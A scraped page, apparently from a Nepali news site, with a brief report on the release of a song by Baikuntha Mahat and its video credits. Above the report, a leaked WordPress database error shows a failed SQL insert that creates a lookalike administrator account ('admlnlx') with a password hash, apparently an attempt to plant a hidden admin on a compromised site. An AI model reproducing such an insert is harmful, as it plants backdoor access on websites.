WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bn1xfz0CyrvCQjSIB/7Hzwn1IEMLLM/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:09:24', '', 'admlnlx', 'admlnlx')
चितवन,फागुन ५-
विन्ध्यवासिनी म्युजिक प्रालिको प्रस्तुतिमा बैकुण्ठ महतको सालैजो गित काफलु जस्तै वजारमा आएको छ ।मुना थापा र वैकुण्ठ महतको स्वर रहेको सो एल्वममा शव्द प्रल्हाद सुवेदीको रहेको छ भने लय वैकुण्ठ महतकोनै रहेको छ । गितको भिडियो पनि सार्वजनिक भएको छ । गितको भिडियोमा अजय रेग्मिको छायांकन,अनुप सिवाकोटीको सम्पादन र कुमार केसीको निर्देशन रहेको छ । मन्जुश्री फिल्मस्ले निर्माण गरेको भिडियोमा प्रकास सपुत र चेतन थापाले अभिनय गरेका छन् ।